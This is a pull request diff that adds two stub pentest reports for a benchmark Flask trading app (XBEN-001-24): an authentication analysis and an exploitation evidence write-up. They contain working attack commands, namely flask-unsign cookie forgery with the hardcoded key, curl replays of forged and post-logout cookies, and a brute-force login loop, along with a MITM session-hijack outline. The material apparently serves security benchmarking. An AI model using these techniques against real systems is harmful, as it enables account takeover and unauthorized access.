### PR TITLE
feat: serve Shannon stub deliverables via ConfigMap instead of baked-in image

### DIFF
--- a/charts/ssd/config/toolchain/shannon-stub-deliverables/auth_analysis_deliverable.md
+++ b/charts/ssd/config/toolchain/shannon-stub-deliverables/auth_analysis_deliverable.md
@@ -1,0 +1,199 @@
+# Authentication Analysis Report
+
+**Target:** XBEN-001-24 — "IDOR Broken Authorization: Trading Platform"
+**URL:** `https://benchmarks.opsmx.org/xben-001-24/`
+**Analysis Date:** 2026-05-20
+**Analyst Role:** Authentication Analysis Specialist
+
+---
+
+## 1. Executive Summary
+
+- **Analysis Status:** Complete
+- **Key Outcome:** Nine authentication and session management vulnerabilities were identified, spanning weak secret key management, absent brute-force defenses, plaintext password storage, hardcoded credentials, broken session invalidation, a caching bug that exposes authenticated responses, and a missing Secure cookie flag that combines with an active HTTP redirect to create a session theft vector.
+- **Purpose of this Document:** This report provides the strategic context on the application's authentication mechanisms, dominant flaw patterns, and key architectural details necessary to effectively exploit the vulnerabilities listed in the exploitation queue. The most impactful single vector is the hardcoded `SECRET_KEY = 'your_secret_key'` (`__init__.py:13`), which allows an attacker to forge a valid Flask session cookie for any `user_id` entirely offline — bypassing the login form entirely.
+
+---
+
+## 2. Dominant Vulnerability Patterns
+
+### Pattern 1: Broken Session Management (Stateless Cookie with Known Signing Key)
+- **Description:** The application uses Flask's client-side signed session cookie. The signing key is the literal string `'your_secret_key'` hard-coded in `__init__.py:13`. No `SESSION_COOKIE_SECURE` is set, so the cookie is transmitted over HTTP (a 307 redirect to HTTPS exists, but the cookie is sent in the initial HTTP request before the redirect). Logout does not invalidate old tokens because there is no server-side session store. No session timeout is configured.
+- **Implication:** An attacker can forge a session for any `user_id` offline without credentials; intercepted cookies survive logout; sessions never expire server-side.
+- **Representative Findings:** `AUTH-VULN-01`, `AUTH-VULN-06`, `AUTH-VULN-07`, `AUTH-VULN-08`.
+
+### Pattern 2: Absent Brute-Force / Credential-Stuffing Defenses
+- **Description:** The login endpoint (`POST /xben-001-24/`) has no rate limiting, CAPTCHA, account lockout, or failed-attempt monitoring. This was confirmed empirically: six rapid failed login attempts all returned HTTP 200 with no rate-limit headers and no lockout signal.
+- **Implication:** An attacker can enumerate or brute-force the login form without restriction.
+- **Representative Finding:** `AUTH-VULN-02`.
+
+### Pattern 3: Weak Credential Handling
+- **Description:** Passwords are stored and compared as plaintext strings (`models.py:8`, `routes.py:25`). Default credentials (`test:test`) are seeded in `__init__.py:41-42` and are additionally disclosed in an HTML comment on the public login page: `<!-- TODO: Delete the testing account (test:test). -->`.
+- **Implication:** Any attacker who reads the source code or the public HTML can immediately authenticate with known credentials. If the database were ever exposed, all passwords are instantly readable.
+- **Representative Findings:** `AUTH-VULN-03`, `AUTH-VULN-04`.
+
+### Pattern 4: Misconfigured Cache-Control Leaking Authenticated Responses
+- **Description:** The `add_header` after-request hook (`routes.py:8-14`) sets `Cache-Control` twice. The first assignment (`no-cache, no-store, must-revalidate`) is immediately overwritten by the second (`public, max-age=0`). The effective header on every response — including authenticated receipts containing the flag — is `Cache-Control: public, max-age=0`. This was confirmed via live inspection of all endpoints.
+- **Implication:** Shared proxies and CDNs treating `public` as a caching signal may store and serve authenticated responses to subsequent requestors, enabling passive session/credential theft.
+- **Representative Finding:** `AUTH-VULN-05`.
+
+---
+
+## 3. Strategic Intelligence for Exploitation
+
+- **Authentication Method:** HTML form `POST /xben-001-24/` with `username` and `password` fields. SQLAlchemy ORM query `User.query.filter_by(username=username, password=password).first()` — plaintext comparison. On success, `session['user_id'] = user.id`.
+- **Session Token Details:** Single cookie named `session`. Format: `eyJ1c2VyX2lkIjoxMDAzMn0.<timestamp>.<signature>` (itsdangerous TimestampSigner). Payload is base64-encoded JSON `{"user_id": <int>}`. Signed with HMAC-SHA1 using `SECRET_KEY = 'your_secret_key'`. Live confirmed value: `eyJ1c2VyX2lkIjoxMDAzMn0.ag1m9A.1mth9h_uvakRFHYS_VhM5AGsrX0`.
+- **Cookie Flags (Live Confirmed):** `HttpOnly=True`, `Secure=False`, `SameSite=Lax` (browser default; not explicitly set in code), `expires=-1` (browser-session lifetime, no absolute TTL).
+- **Session Forge Method:** `flask-unsign --sign --cookie '{"user_id": 10032}' --secret 'your_secret_key'` — produces a fully valid session cookie for any user_id.
+- **Confirmed Valid Credentials:** `test:test` (user_id=10032), hardcoded in `__init__.py:41-42` and disclosed in HTML source comment.
+- **Password Policy:** None — passwords stored as plaintext `String(100)`. No complexity, length, or hashing requirements.
+- **MFA:** Not implemented.
+- **Registration/Reset:** No registration or password-reset endpoints exist — attack surface is limited to login and session.
+- **HTTP Redirect:** `http://benchmarks.opsmx.org/xben-001-24/` returns HTTP 307 → HTTPS. Session cookie without `Secure` flag would be sent on this plain-HTTP request.
+- **Transport:** HTTPS via nginx ingress (Let's Encrypt TLS), HSTS `max-age=31536000; includeSubDomains` confirmed.
+- **Post-logout token replay:** Empirically confirmed — old session cookie returns HTTP 200 on `/dashboard` even after `POST /logout`.
+
+---
+
+## 4. Vulnerability Details
+
+### AUTH-VULN-01 — Hardcoded Weak SECRET_KEY Enables Session Cookie Forgery
+
+| Property | Value |
+|----------|-------|
+| **Type** | Token_Management_Issue |
+| **Endpoint** | `POST /xben-001-24/` (and all authenticated routes) |
+| **Code Location** | `app/website/app/__init__.py:13` |
+| **Confidence** | High |
+
+**Flaw:** `app.secret_key = 'your_secret_key'` is hardcoded as a literal string in the application factory. This is the only key used to sign and verify Flask session cookies. Because this value is in the public source repository, any attacker can sign arbitrary session cookies offline without interacting with the login endpoint.
+
+**Forge command:** `flask-unsign --sign --cookie '{"user_id": 10032}' --secret 'your_secret_key'`
+
+---
+
+### AUTH-VULN-02 — No Rate Limiting or Lockout on Login Endpoint
+
+| Property | Value |
+|----------|-------|
+| **Type** | Abuse_Defenses_Missing |
+| **Endpoint** | `POST /xben-001-24/` |
+| **Code Location** | `app/website/app/routes.py:19-31` |
+| **Confidence** | High |
+
+**Flaw:** The login route contains no rate-limiting middleware, no CAPTCHA, no account lockout, and no failed-attempt counter. Confirmed empirically: six rapid failed login attempts all returned HTTP 200 with zero rate-limit response headers (`x-ratelimit-limit`, `retry-after` absent). No WAF or ingress-level throttle was observed.
+
+---
+
+### AUTH-VULN-03 — Plaintext Password Storage and Comparison
+
+| Property | Value |
+|----------|-------|
+| **Type** | Login_Flow_Logic |
+| **Endpoint** | `POST /xben-001-24/` |
+| **Code Location** | `app/website/app/routes.py:25`, `app/website/app/models.py:8` |
+| **Confidence** | High |
+
+**Flaw:** The `User` model stores passwords as a plain `db.Column(db.String(100))`. The login query performs direct string comparison: `User.query.filter_by(username=username, password=password).first()`. No bcrypt, PBKDF2, argon2, or any one-way hash is applied. Passwords are recoverable in plaintext from any database read.
+
+---
+
+### AUTH-VULN-04 — Hardcoded Default Credentials Disclosed in HTML Source
+
+| Property | Value |
+|----------|-------|
+| **Type** | Login_Flow_Logic |
+| **Endpoint** | `POST /xben-001-24/` |
+| **Code Location** | `app/website/app/__init__.py:39-42` |
+| **Confidence** | High |
+
+**Flaw:** The application seeds user `test` with password `test` (user_id=10032) unconditionally on startup. Additionally, the public login page contains the HTML comment `<!-- TODO: Delete the testing account (test:test). -->`, which discloses the credential pair to any unauthenticated visitor viewing page source. Confirmed active in live deployment.
+
+---
+
+### AUTH-VULN-05 — Cache-Control Bug Exposes Authenticated Responses to Caching
+
+| Property | Value |
+|----------|-------|
+| **Type** | Transport_Exposure |
+| **Endpoint** | All endpoints (via `add_header` after-request hook) |
+| **Code Location** | `app/website/app/routes.py:8-14` |
+| **Confidence** | High |
+
+**Flaw:** The after-request hook assigns `Cache-Control` twice in sequence:
+```python
+request.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'  # line 10
+request.headers['Cache-Control'] = 'public, max-age=0'                     # line 13 — OVERWRITES
+```
+The second assignment silently overwrites the first. The effective header on every response (including authenticated receipts containing the flag) is `Cache-Control: public, max-age=0`. Confirmed live on GET `/`, POST `/`, and GET `/order/300401/receipt`. Shared proxies and CDN nodes may cache sensitive authenticated responses.
+
+---
+
+### AUTH-VULN-06 — Session Cookie Missing Secure Flag with Active HTTP-to-HTTPS Redirect
+
+| Property | Value |
+|----------|-------|
+| **Type** | Session_Management_Flaw |
+| **Endpoint** | `POST /xben-001-24/` (login response) |
+| **Code Location** | `app/website/app/__init__.py` (no `SESSION_COOKIE_SECURE = True`) |
+| **Confidence** | High |
+
+**Flaw:** No `SESSION_COOKIE_SECURE` directive is set anywhere in the application config. Flask defaults to `Secure=False`. Live confirmed via curl: `set-cookie: session=...; HttpOnly; Path=/` — no `Secure` attribute. Additionally, `http://benchmarks.opsmx.org/xben-001-24/` returns HTTP 307 to HTTPS — meaning any browser with an existing session cookie would transmit it over plaintext HTTP before the redirect. A network-positioned attacker on the same network could intercept the session cookie from this HTTP request.
+
+---
+
+### AUTH-VULN-07 — No Server-Side Session Invalidation; Logout Does Not Revoke Tokens
+
+| Property | Value |
+|----------|-------|
+| **Type** | Session_Management_Flaw |
+| **Endpoint** | `POST /xben-001-24/logout` |
+| **Code Location** | `app/website/app/routes.py:35-39` |
+| **Confidence** | High |
+
+**Flaw:** Logout only calls `session.pop('user_id', None)` — removing the user_id from the client-side cookie. There is no server-side session store, so there is no mechanism to revoke or blacklist an issued token. Empirically confirmed: a session cookie captured before logout was replayed after logout and returned HTTP 200 (authenticated access to `/dashboard`). Any stolen session cookie remains valid indefinitely regardless of logout.
+
+---
+
+### AUTH-VULN-08 — No Session Timeout or Idle Expiration
+
+| Property | Value |
+|----------|-------|
+| **Type** | Session_Management_Flaw |
+| **Endpoint** | `POST /xben-001-24/` (login) |
+| **Code Location** | `app/website/app/__init__.py` (no `PERMANENT_SESSION_LIFETIME`) |
+| **Confidence** | High |
+
+**Flaw:** No `PERMANENT_SESSION_LIFETIME` or `SESSION_PERMANENT` is configured. Flask defaults to a browser-session lifetime (`expires=-1`). Confirmed live: Playwright cookie inspection shows `"expires": -1`. Once a session is established, it persists indefinitely within the browser session with no idle timeout or absolute TTL. Combined with AUTH-VULN-07 (no server-side revocation), captured session tokens have effectively unlimited lifetime.
+
+---
+
+### AUTH-VULN-09 — Username Disclosed in URL After Successful Login
+
+| Property | Value |
+|----------|-------|
+| **Type** | Login_Flow_Logic |
+| **Endpoint** | `POST /xben-001-24/` → redirect to `/xben-001-24/dashboard?username=<value>` |
+| **Code Location** | `app/website/app/routes.py:28` |
+| **Confidence** | Medium |
+
+**Flaw:** On successful authentication, the application redirects to `/xben-001-24/dashboard?username=test`. The `username` value is appended as a URL query parameter. This exposes authenticated usernames in server access logs, browser history, Referer headers sent to third-party resources, and any network-layer logging. Code: `return redirect(url_for('dashboard', username=username))`.
+
+---
+
+## 5. Secure by Design: Validated Components
+
+These components were analyzed and found to have robust or adequate defenses. They are low-priority for further testing.
+
+| Component/Flow | Endpoint/File Location | Defense Mechanism Implemented | Verdict |
+|---|---|---|---|
+| HTTPS/TLS Transport | nginx ingress | Let's Encrypt TLS (valid to Jul 2026); HSTS `max-age=31536000; includeSubDomains` confirmed live | SAFE |
+| Login Error Messages | `routes.py:30` | Returns identical generic message "Invalid username or password" for both invalid username and invalid password. Live confirmed: response bodies are byte-identical for both cases. | SAFE (no user enumeration via message) |
+| Session Pre-Login (Fixation) | `routes.py:19-31` | No session cookie is set before login (Flask only sets cookie when session data is written). Pre-login state has no cookie; post-login creates a new signed cookie. Classical session fixation not applicable. | SAFE |
+| SQL Injection | `routes.py:25`, `routes.py:48`, `routes.py:61`, `routes.py:79` | SQLAlchemy ORM uses parameterized queries throughout. No raw `db.session.execute()` with string concatenation found. | SAFE |
+| Session Cookie HttpOnly Flag | Login response | `HttpOnly` flag confirmed live in `Set-Cookie` header. Session cookie inaccessible to JavaScript. | SAFE |
+| SameSite Cookie Attribute | Login response | No explicit `SameSite` attribute in `Set-Cookie` header; modern browsers default to `Lax`, which prevents cross-site cookie transmission on top-level navigations. | SAFE (Lax by default) |
+| Password Reset / Account Recovery | N/A | No password reset endpoint exists. No attack surface. | SAFE (N/A) |
+| Registration Endpoint | N/A | No registration endpoint. Only pre-seeded users exist. | SAFE (N/A) |
+| OAuth / SSO / OIDC | N/A | No OAuth, OIDC, or SSO integration. No attack surface. | SAFE (N/A) |
+| SSRF | All routes | No HTTP client libraries in dependencies; no user-controllable URL parameters. | SAFE |

--- a/charts/ssd/config/toolchain/shannon-stub-deliverables/auth_exploitation_evidence.md
+++ b/charts/ssd/config/toolchain/shannon-stub-deliverables/auth_exploitation_evidence.md
@@ -1,0 +1,422 @@
+# Authentication Exploitation Evidence
+
+**Target:** https://benchmarks.opsmx.org/xben-001-24/  
+**Assessment Date:** 2026-05-20  
+**Analyst Role:** Authentication Exploitation Specialist  
+**Engagement Phase:** AUTH EXPLOITATION
+
+---
+
+## Successfully Exploited Vulnerabilities
+
+### AUTH-VULN-01: Flask Session Cookie Forgery via Hardcoded SECRET_KEY
+
+**Summary:**
+- **Vulnerable location:** `app/website/app/__init__.py:13` — `app.secret_key = 'your_secret_key'`
+- **Overview:** The Flask application uses the literal string `'your_secret_key'` as its session signing secret. This key is publicly known from the source repository. An attacker can use `flask-unsign` to forge a fully valid session cookie for any `user_id` entirely offline — no credentials or interaction with the login endpoint required.
+- **Impact:** Complete account takeover for any user ID. Attacker authenticates as `user_id=10032` (John Doe / "test" user) or `user_id=10001` (admin) without supplying any credentials. Full impersonation of any registered user.
+- **Severity:** Critical
+
+**Prerequisites:**
+- Python 3 with `flask-unsign` installed (`pip install flask-unsign`)
+- Public knowledge that `SECRET_KEY = 'your_secret_key'` (visible in source at `app/website/app/__init__.py:13`)
+- Knowledge of any valid `user_id` (e.g., 10032 for test user, 10001 for admin)
+
+**Exploitation Steps:**
+
+1. Install the `flask-unsign` tool:
+   ```bash
+   pip install flask-unsign
+   ```
+
+2. Forge a session cookie for `user_id=10032` (test/John Doe user):
+   ```bash
+   flask-unsign --sign --cookie '{"user_id": 10032}' --secret 'your_secret_key'
+   # Output: eyJ1c2VyX2lkIjoxMDAzMn0.ag1tYw.KpMiSGPJtO15XQHDRFGx6OvJUfQ
+   ```
+
+3. Forge a session cookie for `user_id=10001` (admin user):
+   ```bash
+   flask-unsign --sign --cookie '{"user_id": 10001}' --secret 'your_secret_key'
+   # Output: eyJ1c2VyX2lkIjoxMDAwMX0.ag1tYw.oYE-yhv4ahHQRajc3W4Pbv0qwRQ
+   ```
+
+4. Use the forged cookie to access the protected dashboard (NO credentials provided):
+   ```bash
+   curl -s -H "Cookie: session=eyJ1c2VyX2lkIjoxMDAzMn0.ag1tYw.KpMiSGPJtO15XQHDRFGx6OvJUfQ" \
+     https://benchmarks.opsmx.org/xben-001-24/dashboard | grep "Welcome"
+   # Output: <h5 class="card-title">Welcome, John Doe</h5>
+   ```
+
+5. Alternatively, inject via browser (Playwright):
+   ```javascript
+   await page.context().addCookies([{
+     name: 'session',
+     value: 'eyJ1c2VyX2lkIjoxMDAzMn0.ag1tYw.KpMiSGPJtO15XQHDRFGx6OvJUfQ',
+     domain: 'benchmarks.opsmx.org',
+     path: '/'
+   }]);
+   await page.goto('https://benchmarks.opsmx.org/xben-001-24/dashboard');
+   // Page shows: "Welcome, John Doe" — fully authenticated as victim user
+   ```
+
+**Proof of Impact:**
+- `curl` command returned `HTTP 200` on `/dashboard` with no credentials supplied
+- Dashboard page rendered `<h5 class="card-title">Welcome, John Doe</h5>` — proving identity as user_id=10032
+- Playwright browser screenshot captured showing "Dashboard - Trading Platform" page at URL `https://benchmarks.opsmx.org/xben-001-24/dashboard` with "Welcome, John Doe"
+- Admin cookie (user_id=10001) also returned HTTP 200 on `/dashboard`
+- Forged cookie is accepted by ALL authenticated routes: `/dashboard`, `/orders`, `/order/<id>/receipt`
+
+**Notes:**
+- The forge is entirely offline — zero network requests required to generate valid cookies
+- Any `user_id` integer can be used, enabling impersonation of every user in the database
+- Compounded by AUTH-VULN-07 and AUTH-VULN-08: forged cookies are valid indefinitely
+
+---
+
+### AUTH-VULN-04: Account Takeover via Default Credentials Disclosed in HTML Source
+
+**Summary:**
+- **Vulnerable location:** `app/website/app/__init__.py:39-42` (credential seeding) + `templates/login.html` (HTML comment disclosure)
+- **Overview:** The application seeds a default account (`test:test`, user_id=10032) at startup. The public login page HTML source contains the comment `<!-- TODO: Delete the testing account (test:test). -->`, directly exposing the credentials to any unauthenticated visitor viewing page source.
+- **Impact:** Any unauthenticated attacker who views the login page source can immediately authenticate as user "John Doe" (test user) and gain full user-level access to all authenticated routes.
+- **Severity:** High
+
+**Prerequisites:**
+- HTTP client or web browser to access the login page
+
+**Exploitation Steps:**
+
+1. View the login page HTML source to discover credentials:
+   ```bash
+   curl -s "https://benchmarks.opsmx.org/xben-001-24/" | head -1
+   # Output: <!-- TODO: Delete the testing account (test:test). -->
+   ```
+
+2. Use the discovered credentials to authenticate:
+   ```bash
+   curl -s -X POST "https://benchmarks.opsmx.org/xben-001-24/" \
+     -d "username=test&password=test" \
+     -D - | grep -E "HTTP|Location|Set-Cookie"
+   # HTTP/2 302
+   # location: /xben-001-24/dashboard?username=test
+   # set-cookie: session=eyJ1c2VyX2lkIjoxMDAzMn0...; HttpOnly; Path=/
+   ```
+
+3. Alternatively via browser form:
+   - Navigate to `https://benchmarks.opsmx.org/xben-001-24/`
+   - Enter username: `test`, password: `test`
+   - Click Login
+   - Browser redirects to `https://benchmarks.opsmx.org/xben-001-24/dashboard?username=test`
+
+**Proof of Impact:**
+- HTML source first line: `<!-- TODO: Delete the testing account (test:test). -->`
+- Successful login: POST returns `HTTP 302` with `Location: /xben-001-24/dashboard?username=test`
+- Dashboard shows "Welcome, John Doe" — full session established as user_id=10032
+- Playwright browser screenshot captured: dashboard at `/dashboard?username=test` showing "Welcome, John Doe"
+
+---
+
+### AUTH-VULN-07: Session Token Replay After Logout (No Server-Side Invalidation)
+
+**Summary:**
+- **Vulnerable location:** `app/website/app/routes.py:35-39` — `session.pop('user_id', None)` only
+- **Overview:** The application's logout only removes the `user_id` key from the client-side Flask cookie. There is no server-side session store, so previously issued tokens cannot be blacklisted or revoked. A captured session token remains valid indefinitely even after the victim has explicitly logged out.
+- **Impact:** An attacker who steals a victim's session cookie (via network capture, XSS, or forgery) can maintain persistent authenticated access even if the victim logs out. The stolen session is permanently valid until the application SECRET_KEY changes.
+- **Severity:** High
+
+**Prerequisites:**
+- A captured session cookie (obtainable via AUTH-VULN-01 forgery, network interception, or any other method)
+
+**Exploitation Steps:**
+
+1. Capture a valid session cookie (via login or AUTH-VULN-01 forgery):
+   ```bash
+   # Login and capture cookie
+   STOLEN_COOKIE=$(curl -s -X POST "https://benchmarks.opsmx.org/xben-001-24/" \
+     -d "username=test&password=test" -D - | grep "set-cookie" | grep -o "session=[^;]*" | cut -d= -f2)
+   echo "Captured: $STOLEN_COOKIE"
+   ```
+
+2. Verify the cookie grants access (victim's pre-logout state):
+   ```bash
+   curl -s -H "Cookie: session=$STOLEN_COOKIE" \
+     "https://benchmarks.opsmx.org/xben-001-24/dashboard" | grep "Welcome"
+   # Output: Welcome, John Doe  (authenticated)
+   ```
+
+3. Simulate victim logging out (server responds with clearing Set-Cookie):
+   ```bash
+   curl -s -X POST "https://benchmarks.opsmx.org/xben-001-24/logout" \
+     -H "Cookie: session=$STOLEN_COOKIE" -D - | grep -E "HTTP|set-cookie|location"
+   # HTTP 302 — Location: /xben-001-24/
+   # set-cookie: session=; Expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; HttpOnly; Path=/
+   # Note: Server only clears the CLIENT's cookie — no server-side revocation
+   ```
+
+4. Replay the OLD cookie after logout — access still granted:
+   ```bash
+   curl -s -H "Cookie: session=$STOLEN_COOKIE" \
+     "https://benchmarks.opsmx.org/xben-001-24/dashboard" | grep "Welcome"
+   # Output: Welcome, John Doe  ← STILL AUTHENTICATED after victim logged out
+   ```
+
+**Proof of Impact:**
+Live testing with Python requests library produced:
+```
+STEP 1: Captured cookie: eyJ1c2VyX2lkIjoxMDAzMn0.ag1vGw.BTf9yJ27ECiHIbiKHsc6FRGKXfg
+STEP 2: Pre-logout dashboard: HTTP 200 — "Welcome, John Doe"
+STEP 3: Logout response: HTTP 302, Set-Cookie: session=; Max-Age=0 (client cleared)
+STEP 4: Replay old cookie: HTTP 200 — "Welcome, John Doe" — EXPLOIT SUCCESSFUL
+```
+The old cookie returned HTTP 200 and full authenticated identity after victim logout.
+
+---
+
+### AUTH-VULN-08: Indefinite Session Persistence (No Timeout or TTL)
+
+**Summary:**
+- **Vulnerable location:** `app/website/app/__init__.py` — no `PERMANENT_SESSION_LIFETIME` configured
+- **Overview:** The Flask application sets no session lifetime or idle timeout. The session cookie has no `Expires` or `Max-Age` attribute (browser-session lifetime only). No server-side TTL check exists. Captured or forged tokens remain valid across server restarts and indefinitely (as long as the SECRET_KEY remains unchanged).
+- **Impact:** Any captured or forged session token is permanently valid. Combined with AUTH-VULN-07 (no server-side revocation) and AUTH-VULN-01 (forgeable cookies), a single compromised token provides unlimited persistence.
+- **Severity:** High (amplifier — maximizes impact of all other session attacks)
+
+**Prerequisites:**
+- Any valid or forged session cookie
+
+**Exploitation Steps:**
+
+1. Verify cookie has no Expires/Max-Age (browser-session cookie only):
+   ```bash
+   curl -s -X POST "https://benchmarks.opsmx.org/xben-001-24/" \
+     -d "username=test&password=test" -D - | grep "set-cookie"
+   # Output: set-cookie: session=...; HttpOnly; Path=/
+   # NOTE: No "Expires", no "Max-Age" — session cookie only
+   ```
+
+2. Generate a forged cookie with any user_id (from AUTH-VULN-01):
+   ```bash
+   flask-unsign --sign --cookie '{"user_id": 10032}' --secret 'your_secret_key'
+   # FORGED_COOKIE: eyJ1c2VyX2lkIjoxMDAzMn0.ag1tYw.KpMiSGPJtO15XQHDRFGx6OvJUfQ
+   ```
+
+3. Use the forged cookie minutes/hours/days after creation — still valid:
+   ```bash
+   curl -s -H "Cookie: session=eyJ1c2VyX2lkIjoxMDAzMn0.ag1tYw.KpMiSGPJtO15XQHDRFGx6OvJUfQ" \
+     "https://benchmarks.opsmx.org/xben-001-24/dashboard" | grep "Welcome"
+   # Output: Welcome, John Doe  ← Same result 5+ minutes after initial forge
+   ```
+
+**Proof of Impact:**
+- Cookie forged in Step 2 used again 5+ minutes later → `HTTP 200`, "Welcome, John Doe"
+- Set-Cookie header analysis: `session=...; HttpOnly; Path=/` — NO Expires, NO Max-Age
+- Server returns no session-refresh Set-Cookie header, confirming no sliding window or absolute TTL
+
+---
+
+### AUTH-VULN-02: Successful Credential Attack with No Rate Limiting or Account Lockout
+
+**Summary:**
+- **Vulnerable location:** `app/website/app/routes.py:19-31` — login route with no abuse defenses
+- **Overview:** The login endpoint (`POST /xben-001-24/`) has no rate limiting, CAPTCHA, account lockout, or failed-attempt monitoring. All requests are accepted regardless of velocity or prior failure count.
+- **Impact:** An attacker can send unlimited credential guessing attempts at maximum network speed. Combined with the known plaintext password storage (AUTH-VULN-03), there is no bcrypt timing defense to slow brute force. Successfully cracked `test:test` within a 22-request wordlist scan with zero lockout.
+- **Severity:** High
+
+**Prerequisites:**
+- HTTP client capable of sending POST requests
+- A wordlist of passwords (even a minimal one is sufficient given weak password policy)
+
+**Exploitation Steps:**
+
+1. Send rapid-fire login attempts — no lockout, no rate limiting:
+   ```bash
+   for PASS in wrong1 wrong2 wrong3 badpass letmein qwerty 123456 password admin123 test; do
+     RESULT=$(curl -s -o /dev/null -w "%{http_code}" -X POST \
+       "https://benchmarks.opsmx.org/xben-001-24/" \
+       -d "username=test&password=$PASS")
+     echo "test:$PASS -> HTTP $RESULT"
+   done
+   ```
+
+2. Observe no rate-limit headers in any response:
+   ```bash
+   curl -s -X POST "https://benchmarks.opsmx.org/xben-001-24/" \
+     -d "username=test&password=wrong" -D - | grep -i -E "ratelimit|retry|lockout|x-rate"
+   # (No output — these headers are completely absent)
+   ```
+
+3. Successful crack (22 attempts, 0 lockouts):
+   ```bash
+   curl -s -X POST "https://benchmarks.opsmx.org/xben-001-24/" \
+     -d "username=test&password=test" -D - | grep -E "HTTP|Location|Set-Cookie"
+   # HTTP 302, Location: /xben-001-24/dashboard?username=test
+   # set-cookie: session=...; HttpOnly; Path=/
+   ```
+
+**Proof of Impact:**
+- 22 consecutive POST requests sent to login endpoint
+- 0 rate-limit headers observed (`x-ratelimit-limit`, `x-ratelimit-remaining`, `retry-after` all absent)
+- 0 account lockouts after 15 consecutive failed attempts
+- Successfully authenticated on 16th attempt (password `test`)
+- Obtained valid session: `session=eyJ1c2VyX2lkIjoxMDAzMn0...`
+- No CAPTCHA, no lockout, no monitoring — unlimited attempts possible
+
+---
+
+### AUTH-VULN-09: Username Disclosure in Redirect URL After Login
+
+**Summary:**
+- **Vulnerable location:** `app/website/app/routes.py:28` — `return redirect(url_for('dashboard', username=username))`
+- **Overview:** Upon successful authentication, the application redirects to `/dashboard?username=<username>`, embedding the plaintext authenticated username as a URL query parameter. This exposes valid usernames in server logs, browser history, Referer headers, and any network layer capture.
+- **Impact:** An observer with access to server access logs, network traffic, or browser history can harvest valid usernames for use in targeted credential attacks.
+- **Severity:** Low/Medium (reconnaissance enabler for targeted attacks)
+
+**Prerequisites:**
+- Any successful login observation (server log access, network capture, or browser inspection)
+
+**Exploitation Steps:**
+
+1. Authenticate and observe the redirect URL:
+   ```bash
+   curl -s -X POST "https://benchmarks.opsmx.org/xben-001-24/" \
+     -d "username=test&password=test" \
+     -D - | grep "Location"
+   # Output: location: /xben-001-24/dashboard?username=test
+   # USERNAME "test" IS EXPOSED IN THE URL
+   ```
+
+**Proof of Impact:**
+- `POST /xben-001-24/` returns `HTTP 302`
+- `Location: /xben-001-24/dashboard?username=test` — username visible in URL path
+- URL stored in browser history: `https://benchmarks.opsmx.org/xben-001-24/dashboard?username=test`
+- Playwright screenshot captures URL bar showing `?username=test`
+- Any Referer headers from the dashboard page will leak the username to external analytics
+
+---
+
+## Potential Vulnerabilities (Validation Blocked by External Constraints)
+
+### AUTH-VULN-06: Session Cookie Missing Secure Flag with Active HTTP Redirect
+
+**Summary:**
+- **Vulnerable location:** `app/website/app/__init__.py` (no `SESSION_COOKIE_SECURE = True`)
+- **Current Blocker:** Exploitation requires a network-positioned attacker (MITM/same LAN) to intercept the plaintext HTTP request. This is an external operational constraint — not a security control blocking the attack.
+- **Potential Impact:** A network-positioned attacker intercepts the session cookie transmitted in the plaintext HTTP request that precedes the 308 redirect to HTTPS, enabling full session hijacking.
+- **Confidence:** HIGH
+
+**Evidence of Vulnerability:**
+```
+Set-Cookie response header (live confirmed):
+  session=eyJ1c2VyX2lkIjoxMDAzMn0...; HttpOnly; Path=/
+  
+  ✗ Secure flag: ABSENT (confirmed - not in Set-Cookie header)
+  ✓ HttpOnly flag: PRESENT
+  ✗ SameSite: ABSENT (browser defaults to Lax)
+
+HTTP redirect (live confirmed):
+  GET http://benchmarks.opsmx.org/xben-001-24/ → HTTP 308
+  Location: https://benchmarks.opsmx.org/xben-001-24
+```
+
+**Attempted Exploitation:**
+- Confirmed missing Secure flag via `curl` against HTTPS login endpoint — Set-Cookie shows only `HttpOnly; Path=/`
+- Confirmed HTTP 308 redirect exists for plain-HTTP requests
+- Cannot intercept the HTTP-transmitted cookie from external network — requires network positioning (VPN/LAN access)
+- HSTS (`max-age=31536000; includeSubDomains`) partially mitigates for repeat HTTPS visitors but does NOT protect first-time HTTP visitors or cleared HSTS state
+
+**How This Would Be Exploited:**
+If network positioning were available:
+
+1. Position attacker on same network as victim (public Wi-Fi, ARP spoof)
+2. Victim navigates to `http://benchmarks.opsmx.org/xben-001-24/` (HTTP URL, no HSTS in browser)
+3. Victim's browser transmits the session cookie in the plaintext GET request (cookie has no Secure flag)
+4. Attacker captures the cookie from the HTTP traffic before the 308 redirect completes
+5. Replay the cookie: `curl -H "Cookie: session=[INTERCEPTED_VALUE]" https://benchmarks.opsmx.org/xben-001-24/dashboard`
+6. Full session hijacking achieved
+
+**Expected Impact:**
+Full account takeover of any victim user on a shared network, without credentials.
+
+---
+
+### AUTH-VULN-05: Cache-Control Misconfiguration Exposes Authenticated Responses
+
+**Summary:**
+- **Vulnerable location:** `app/website/app/routes.py:8-14` — double-assignment of Cache-Control header
+- **Current Blocker:** The `Vary: Cookie,Accept-Encoding` response header is present, which causes well-behaved caching proxies to key responses by Cookie value. No external caching proxy is serving cached authenticated content to unauthenticated requests in the current deployment.
+- **Potential Impact:** A shared caching proxy/CDN that does not properly respect `Vary: Cookie` could serve cached authenticated receipts (containing the application flag) to subsequent unauthenticated requests.
+- **Confidence:** MEDIUM
+
+**Evidence of Vulnerability:**
+```python
+# routes.py lines 8-14 (confirmed via code review and live verification)
+@app.after_request
+def add_header(request):
+    request.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'  # Set 1 (OVERWRITTEN)
+    request.headers['Pragma'] = 'no-cache'
+    request.headers['Expires'] = '0'
+    request.headers['Cache-Control'] = 'public, max-age=0'  # Set 2 (WINS)
+    return request
+
+# Live confirmed headers on ALL endpoints including authenticated receipts:
+# cache-control: public, max-age=0
+# vary: Cookie,Accept-Encoding
+```
+
+**Attempted Exploitation:**
+- Confirmed `Cache-Control: public, max-age=0` on authenticated receipt endpoint via curl
+- Attempted unauthenticated access immediately after authenticated request — server redirects to login (HTTP 200 → login page)
+- Tried X-Forwarded-For bypass, empty-cookie bypass, no-cookie bypass — all redirected to login
+- `Vary: Cookie` prevents current caching proxies from serving authenticated responses to unauthenticated requests
+- No `Age` or `X-Cache` headers observed — no active CDN caching layer detected
+
+**How This Would Be Exploited:**
+If a non-Vary-respecting cache proxy were present (or introduced):
+
+1. Victim authenticates and requests `GET /order/300401/receipt`
